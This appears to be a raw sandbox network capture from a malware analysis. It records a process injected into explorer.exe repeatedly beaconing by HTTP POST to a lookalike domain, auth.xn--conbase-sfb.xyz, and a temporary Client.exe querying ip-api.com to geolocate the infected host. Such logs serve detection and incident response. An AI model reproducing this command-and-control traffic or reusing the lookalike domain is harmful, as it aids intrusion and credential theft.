Jul 6, 2024 13:27:54.020123959 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLF0BKT0aHWD0SVy0JFuuh8YVN3PWQgQlGtJRNInMLhGAxZKkzRMsNBKF4D%2BgBw6L1gyjgO8p%2FOLhIL2aZkB5DZHdBuWPZyHLtdyASS37L4oLy%2B19jzJt4xFLdt4oKn6iNYs1Wp880%2BiZUY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f88ad977ca6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49805	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:54.303209066 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:54.308731079 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:55.139020920 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClaKp0FAZHa8ixJxmEEjfTI7mnW9iYLvmnGxhep25cwBW0xWhTR9cXX3C9Hmb%2FrRowkdL5%2Bo0u16bpx3OiFv8U%2BrhUkVZ8qzn1sgG%2BOugZ%2BfxraLzEmMsvJJmUhnrOckHvj4BIvbWsfm2Yk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f8f0bf70f4b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49806	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:55.258519888 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:55.263797998 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:56.015944004 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysgOjSRASCrgjcuX3OWU4ZxoqUgGLa%2FA79DT1nuLYWSaKkQ0AZhhaWygjcaPUAPZQa6HHNNnYFGOPZwkbFSJEpsF2jK6QIr66F8BptMY7K2vsAzmhtYKwizajqRr9vjKymlnq8kApInUIQI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f94ec780f9f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49807	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:56.133136988 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:56.138015985 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:56.853563070 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anlTDWCavDrRM8x24Ek3xrKbVlCJeh3JB47m%2BnssBfMH6b5c%2BalAOoh8NJt8SXBt%2FqiUUqiBZyjz4M0sMQsBuC3Yubwb7tkVL4JtrFj1BzuejywXy9mhW9bVWaCPGDxZWOrWNV9xT6sJH0Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f9a6fd44276-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49808	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:56.977998018 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:56.983895063 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:57.796525002 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVVqCmMwiMivDcVPK5rJDuw4gxfckz4BTZNXmA7nVdibzYDJeYDWGh8OlnG1cRDD7yj3qLC6x%2BovvkacPtzX6ZUc4NTFbg54RtX%2B%2BtYmSXHC8sE2wjfg9qm7fI4jED2%2BMX%2B%2FVWYP%2BMAhW2U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3f9fbf707d13-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49810	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:57.914474010 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:57.919308901 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:58.632778883 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLBzLPgDddsVBGdHgY%2F0ymEI6FvfsNf%2FXrKEPZV2F6mREAyjXv9uef9VqnR22WZQMjXlxKNAYoCZ1KySkVsZX2Mmo2i3c7a6BWL8jXsK3itwsUI6cJpSYSCUUKVxQJFrpVHpQXpzEmLmDSk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fa58ee043a9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49812	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:58.758425951 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:58.764070988 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:59.492866993 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsFvplpJAQO0A%2F57fHYomS6tus%2F4l2ZvuWYbmez7ewhzBYpcBX7mWYgjP4jZSePtLs3KBUXYM3pddWQIZEfkXmBFIAc6WM2Qv8MWXdIhplIj59CubKUMcfwlPNpN46FWsbGLjOnfb%2FQwS3c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3faabc2042ac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49814	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:59.602953911 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:59.607975006 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:01.432348013 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoILp7ysl1FED%2BkDJEW6YjksbZSPmBy6Bb7dhoEgZMk2pTJDb76zY5acRF4fM4%2FDNTvl%2Fa0TgaNVjSK%2FOHjKzipTC0rtJuxBUXXPV1tuX9V0%2FaL3XzTTIqDW9tuuTXRBXFhwlkXaNIb8V%2Bk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fb018e143a5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49815	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:01.558139086 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:01.565984011 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:02.274036884 CEST	627	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a%2BXHll9r4Y6wkpd%2FXwtdwPXmIlkFlhA8%2BXAon0GQdlhgcoAtXUYSbrZb%2Bt9yzwmZ2il%2BoKSu%2BwaIuB0gq4Drv%2FmdUVvsL5J%2BepDeXr0x3lxoSjd79RDC5Q22ro6EPtJrH4wyFQGYTC3DEs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fbc4f568c45-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49816	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:02.399445057 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:02.404653072 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:03.112416029 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFZ3kV6Tg6GXDRv2yLPX0UvNzFS4Oq0Lra76EicC4w6gQbPRrI38dosjfmyDMS7QKT6gFxkZ03VpBY%2Fui9sUfBhguI7gFpseQHfBt0cus%2BWKdfN9Bl3mzxRDAQMmnXotHiIaPRxiuGtC%2FrA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fc1884d43ff-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49817	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:03.274019957 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:03.278930902 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:03.977922916 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SOgBgz369WOoBgZMwp5YhrWfDmU1OQrWqdcgN5gq75fnEJUAmH5P9mavOnvDCxuoZBY5afuX0VQlurLsQE8gTrywOKFX8j3utUQIQ4SoK4CiP8rN9u%2BWwnMZ7BlOUkgTIX5RNxQXrAo0Dw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fc70abb03d5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49818	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:04.101862907 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:04.106735945 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:04.841696978 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2FrfpekPiSyWMlEv5CzKypnoxb0kvzzzxB%2BooFciQJZkGa92g%2FVsO4Iv39rwrQpAroA4jfAyuhYj%2BkjDHAD7gBwCCFGc1MC4xdgngmOZjyapB3dNNvCp6pDRp6c3ckKNfl7mbF6sraZWauM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fcc4dd341c1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49820	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:04.964754105 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:04.971834898 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:06.142360926 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x88LsBjV7Z%2BsZNaHzrXGgRVxRabR8drv0k%2Bc2EYkXcJEHPQSbpmugjakNz0inxeABRqEuS0PMJUaTdDtmhM%2BGCVeQIGQyBd00PKYbLEvWY0WmuVoM8wvMgR4w1VgQacPR%2BXk4Lm8mk%2Fbc5g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fd19cf10ca4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49821	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:06.260272980 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:06.265111923 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:08.007846117 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vai2hAROde3zJ9GzI1fB7GJGsXj%2FPbo70Qh%2BcQq1u7ak4P3wVITh%2Fnn%2BvrhWVJbvUk9gCP7nGKxoyzwIPrrsi6JD%2FMPd6PxouChYgIOf4UHeAWaQH9Z%2FQZjdASUr3NGzliYJlWi27zNy5oI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fd9bd274374-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49823	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:08.134244919 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:08.138993025 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:08.875502110 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAwnPGZi4KklvCOTnAkLMILPJwDoVPLtWf%2B4O2VihvbC1%2FZ96TV7Sg0e5gzcB1J%2BFCCQldR61tdtedJ1FLX17iXtm31yQtd6gBzx8VyIff%2B6F%2B1oDNVlKoiouCyTNaUzGWsMOIdtit2Y3ZE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3fe588614364-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49825	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:08.993180990 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:09.000973940 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:09.773951054 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGNxPx7aY%2BTfV%2BWcyHAhlxs5cNp0zRyFDUt%2BKrkLoZNaMhfqjZnSroAJN%2FDzBnN3I0PMLBC%2FGcrRVXBaSiXbCniCl5fhfZJml%2FjY5YrHoRzoHFeXiU79ZmiPk3KbczR571Gb7L6c5wFdk%2B8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3feacfbd1845-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49827	208.95.112.1	80	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:09.892272949 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 6, 2024 13:28:10.367538929 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:10 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49828	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:09.898941994 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:09.903961897 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:10.625601053 CEST	613	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqX4YBOb7EXozKG8rUyKvSSoZaPXWiXySPNUs6j3wRjCoUH4MIqvSTV8XkmqrmjIjGza2dpP48xtoTZhhzt90vM5aFVpW3096trZYVzk40ngT%2FI0iXLIGYHVddKkUQ5x5iBgxLjMvqZoXuk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ff08afa4379-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49829	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:10.743030071 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:10.748076916 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:11.450417042 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIMX694r5HzVwFKQN5sAv74AorXonJQ%2BsuKlZtCjEx6sqPF5NmPIpOGCtUwzF%2FCZaXG2TYM%2BfvN93QMy%2BOqeCwxtiR7hwAYLysXKbi%2BWNAe9Yp39yEteAvs4hqca6AIceVxVR%2B%2BysAhoViE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ff5bc578cd6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49830	208.95.112.1	80	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:10.796139002 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
